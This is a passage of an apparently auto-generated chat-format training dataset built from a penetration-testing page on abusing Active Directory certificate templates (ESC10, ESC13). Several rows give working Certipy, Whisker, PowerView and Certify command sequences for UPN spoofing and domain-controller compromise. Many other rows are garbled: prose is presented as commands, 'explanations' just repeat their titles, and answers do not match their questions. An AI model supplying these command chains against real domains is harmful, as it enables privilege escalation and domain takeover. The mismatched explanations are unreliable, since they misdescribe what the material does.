modification part with [Whisker](https://github.com/eladshamir/Whisker):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Here, user1 has `GenericWrite` against user2 and want to compromise user3.\n\nFirst, the user2's credentials are needed. It can be retrieved via a [Shadow Credentials](../kerberos/shadow-credentials.md) attack, for example. Here just the `msDs-KeyCredentialLink` modification part with [Whisker](https://github.com/eladshamir/Whisker):", "metadata": {"corpus_index": 87, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Here, user1 has `GenericWrite` against user2 and want to compromise user3.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Here, user1 has `GenericWrite` against user2 and want to compromise user3.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 87, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the A command to find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "A certificate permitting client authentication can be requested in a user2 session."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the A command to find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "A certificate permitting client authentication can be requested in a user2 session.", "metadata": {"corpus_index": 88, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "A"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "A certificate permitting client authentication can be requested in a user2 session."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "A certificate permitting client authentication can be requested in a user2 session.", "metadata": {"corpus_index": 88, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `A certificate permitting client authentication can be requested in a user2 session.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `A certificate permitting client authentication can be requested in a user2 session.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 88, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certificate templates - Case 2?"}, {"role": "assistant", "content": "* CertificateMappingMethods is set to 0x4, meaning no strong mapping is performed and only the UPN will be checked\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B without a UPN already set (machine accounts or buit-in Administrator account for example)\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the CertificateMappingMethods value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario. \n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authentication with the obtained certificate will be performed through Schannel. The -ldap-shell option can be used to execute some LDAP requests and, for example, realised an RBCD to fully compromised the domain controller.\n\n`bash\ncertipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n=="}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certificate templates - Case 2?", "response": "* CertificateMappingMethods is set to 0x4, meaning no strong mapping is performed and only the UPN will be checked\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B without a UPN already set (machine accounts or buit-in Administrator account for example)\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the CertificateMappingMethods value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario. \n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authentication with the obtained certificate will be performed through Schannel. The -ldap-shell option can be used to execute some LDAP requests and, for example, realised an RBCD to fully compromised the domain controller.\n\n`bash\ncertipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n==", "metadata": {"corpus_index": 89, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - Case 2?"}, {"role": "assistant", "content": "* CertificateMappingMethods is set to 0x4, meaning no strong mapping is performed and only the UPN will be checked\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B without a UPN already set (machine accounts or buit-in Administrator account for example)\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the CertificateMappingMethods value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario. \n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authentication with the obtained certificate will be performed through Schannel. The -ldap-shell option can be used to execute some LDAP requests and, for example, realised an RBCD to fully compromised the domain controller.\n\n`bash\ncertipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n=="}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - Case 2?", "response": "* CertificateMappingMethods is set to 0x4, meaning no strong mapping is performed and only the UPN will be checked\n * A template that specifiy client authentication is enabled (any template, like the built-in User template)\n * GenericWrite right against any account A to compromise any account B without a UPN already set (machine accounts or buit-in Administrator account for example)\n\n> [!WARNING]\n> At the time of writting (06/08/2022), there is no solution as a low privileged user to read the CertificateMappingMethods value. It is worth to try the attack hopping the key is misconfigured.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC10 scenario. \n\nIn this scenario, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's hash is needed. It can be retrieved via a Shadow Credentials attack, for example.\n\n``bash\ncertipy shadow auto -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -account user2\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"\n`\n\nA certificate permitting client authentication can be requested as user2.\n\n`bash\ncertipy req -username \"user2@$DOMAIN\" -hashes \"$NT_HASH\" -ca 'ca_name' -template 'User'\n`\n\nThe user2's UPN is changed back to something else.\n\n`bash\ncertipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"user2@$DOMAIN\"\n`\n\nNow, authentication with the obtained certificate will be performed through Schannel. The -ldap-shell option can be used to execute some LDAP requests and, for example, realised an RBCD to fully compromised the domain controller.\n\n`bash\ncertipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell\n`\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS\n\n==", "metadata": {"corpus_index": 89, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate templates - case 2?"}, {"role": "assistant", "content": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate templates - case 2?", "response": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"", "metadata": {"corpus_index": 90, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - Case 2"}, {"role": "assistant", "content": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - Case 2", "response": "certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"", "metadata": {"corpus_index": 90, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - case 2. Case 2"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy account update -username \"user1@$DOMAIN\" -p \"$PASSWORD\" -user user2 -upn \"DC\\$@$DOMAIN\"`?", "response": "This command is used for certificate templates - case 2. Case 2", "metadata": {"corpus_index": 90, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate templates - case 2?"}, {"role": "assistant", "content": "certipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate templates - case 2?", "response": "certipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell", "metadata": {"corpus_index": 91, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - Case 2 during a pentest?"}, {"role": "assistant", "content": "certipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - Case 2 during a pentest?", "response": "certipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell", "metadata": {"corpus_index": 91, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell`?"}, {"role": "assistant", "content": "This command is used for certificate templates - case 2. Case 2"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy auth -pfx dc.pfx -dc-ip \"$DC_IP\" -ldap-shell`?", "response": "This command is used for certificate templates - case 2. Case 2", "metadata": {"corpus_index": 91, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='DC$@domain.local'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n``\n\nNow, authentication with the obtained certificate will be performed through Schannel. It can be used to perform, for example, an RBCD to fully compromised the domain controller.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='DC$@domain.local'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n``\n\nNow, authentication with the obtained certificate will be performed through Schannel. It can be used to perform, for example, an RBCD to fully compromised the domain controller.\n\n:::", "metadata": {"corpus_index": 92, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Find vulnerable/abusable certificate templates using all groups the current user context is a part of: during a pentest?"}, {"role": "assistant", "content": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='DC$@domain.local'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n``\n\nNow, authentication with the obtained certificate will be performed through Schannel. It can be used to perform, for example, an RBCD to fully compromised the domain controller.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Find vulnerable/abusable certificate templates using all groups the current user context is a part of: during a pentest?", "response": "Certify.exe find /currentuser\n``\n\nHere, user1 has GenericWrite against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's credentials are needed. It can be retrieved via a Shadow Credentials attack, for example. Here just the msDs-KeyCredentialLink modification part with Whisker:\n\n`powershell\nWhisker.exe add /target:\"user2\" /domain:\"domain.local\" /dc:\"DOMAIN_CONTROLLER\" /path:\"cert.pfx\" /password:\"pfx-password\"\n`\n\nThen, the userPrincipalName of user2 is changed to DC$@domain.local with PowerView.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='DC$@domain.local'} -Verbose\n`\n\nA certificate permitting client authentication can be requested in a user2 session.\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"User\"\n`\n\nThe user2's UPN is changed back to something else.\n\n`powershell\nSet-DomainObject user2 -Set @{'userPrincipalName'='user2@dmain.local'} -Verbose\n``\n\nNow, authentication with the obtained certificate will be performed through Schannel. It can be used to perform, for example, an RBCD to fully compromised the domain controller.\n\n:::", "metadata": {"corpus_index": 92, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Here, user1 has `GenericWrite` against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's credentials are needed. It can be retrieved via a [Shadow Credentials](../kerberos/shadow-credentials.md) attack, for example. Here just the `msDs-KeyCredentialLink` modification part with [Whisker](https://github.com/eladshamir/Whisker):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Here, user1 has `GenericWrite` against user2 and want to compromise the domain controller DC$@domain.local.\n\nFirst, the user2's credentials are needed. It can be retrieved via a [Shadow Credentials](../kerberos/shadow-credentials.md) attack, for example. Here just the `msDs-KeyCredentialLink` modification part with [Whisker](https://github.com/eladshamir/Whisker):", "metadata": {"corpus_index": 93, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Here, user1 has `GenericWrite` against user2 and want to compromise the domain controller DC$@domain.local.`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Here, user1 has `GenericWrite` against user2 and want to compromise the domain controller DC$@domain.local.`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 93, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Then, the `userPrincipalName` of user2 is changed to DC$@domain.local with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Then, the `userPrincipalName` of user2 is changed to DC$@domain.local with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1).", "metadata": {"corpus_index": 94, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Then, the `userPrincipalName` of user2 is changed to DC$@domain.local with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1).`?"}, {"role": "assistant", "content": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Then, the `userPrincipalName` of user2 is changed to DC$@domain.local with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1).`?", "response": "This command is used for find vulnerable/abusable certificate templates using all groups the current user context is a part of:. Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "metadata": {"corpus_index": 94, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate templates - (ESC13) Issuance policiy with privileged group linked"}, {"role": "assistant", "content": "For a group to be linked to an issuance policy via msDS-OIDToGroupLink it must meet two requirements:\n\n* Be empty\n* Have a universal scope, i.e. be \"Forest Wide\". By default, \"Forest Wide\" groups are \"Enterprise Read-only Domain Controllers\", \"Enterprise Key Admins\", \"Enterprise Admins\" and \"Schema Admins\"\n\nSo, if a user or a computer can enroll on a template that specifies an issuance policy linked to a highly privileged group, the issued certificate privilegies will be mapped to those of the group.\n\nTo exploit ESC13, here are the requirements:\n\n* The controlled principal can enroll to the template and meets all the required issuance policies\n* The template specifies an issuance policy\n* This policy is linked to a privileged groups via msDS-OIDToGroupLink\n* The template allows the Client Authentication in its EKU\n* All the usual requirements\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) permits to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-Policy property not empty. Additionally, it verifies if this issuance policy has an OID group link to a group in the property msDS-OIDToGroupLink.\n\n``bash\ncertipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'\n`\n\nIf a vulnerable template is found, there is no particular issuance requirement, the principal can enroll, and the template indicates the Client Authentication EKU, request a certificate for this template with Certipy (Python) as usual:\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip 